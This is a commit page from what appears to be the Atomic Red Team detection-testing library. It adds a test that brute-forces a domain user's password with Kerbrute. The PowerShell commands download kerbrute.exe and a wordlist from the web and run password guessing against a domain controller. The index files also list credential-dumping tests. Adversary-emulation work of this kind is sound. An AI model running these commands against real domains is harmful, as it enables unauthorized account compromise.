security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-09-01 17:47:36 +00:00
parent ff5e8e9415
commit 10a9459b6b
8 changed files with 109 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -909,6 +909,7 @@ credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of singl
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
909 credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
910 credential-access T1110.001 Password Guessing 4 SUDO brute force Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a sh
911 credential-access T1110.001 Password Guessing 5 SUDO brute force Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade sh
912 credential-access T1110.001 Password Guessing 6 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
913 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
914 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
915 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -647,6 +647,7 @@ lateral-movement,T1021.001,Remote Desktop Protocol,4,Changing RDP Port to Non St
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
647 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
648 credential-access T1110.001 Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
649 credential-access T1110.001 Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
650 credential-access T1110.001 Password Guessing 6 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
651 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
652 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
653 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1555,6 +1555,7 @@
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1123,6 +1123,7 @@
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
atomics/Indexes/index.yaml
+45
View File
@@ -71487,6 +71487,51 @@ credential-access:
'
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: 'Bruteforce a single user''s password from a wordlist
'
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: String
default: "$ENV:userdnsdomain"
domain:
description: Domain where you will be testing
type: String
default: "$ENV:userdomain"
dependency_executor_name: powershell
dependencies:
- description: 'kerbrute.exe must exist in $env:temp
'
prereq_command: 'if (test-path $env:temp\kerbrute.exe){exit 0} else {exit
1}
'
get_prereq_command: 'invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe"
-outfile "$env:temp\kerbrute.exe"
'
- description: 'bruteuser.txt must exist in $env:temp
'
prereq_command: 'if (test-path $env:temp\bruteuser.txt){exit 0} else {exit
1}
'
get_prereq_command: 'invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true"
-outfile "$env:temp\bruteuser.txt"
'
executor:
name: powershell
elevation_required: false
command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
-d #{domain} $env:temp\\bruteuser.txt TestUser1 "
T1003:
technique:
x_mitre_platforms:
atomics/T1110.001/T1110.001.md
+58
View File
@@ -36,6 +36,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat)
- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool)
<br/>
@@ -319,4 +321,60 @@ yum -y update && yum install -y openssl sudo
<br/>
<br/>
## Atomic Test #6 - Password Brute User using Kerbrute Tool
Bruteforce a single user's password from a wordlist
**Supported Platforms:** Windows
**auto_generated_guid:** 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domaincontroller | Domain controller where test will be run | String | $ENV:userdnsdomain|
| domain | Domain where you will be testing | String | $ENV:userdomain|
#### Attack Commands: Run with `powershell`!
```powershell
cd $env:temp
.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1
```
#### Dependencies: Run with `powershell`!
##### Description: kerbrute.exe must exist in $env:temp
##### Check Prereq Commands:
```powershell
if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
```
##### Description: bruteuser.txt must exist in $env:temp
##### Check Prereq Commands:
```powershell
if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt"
```
<br/>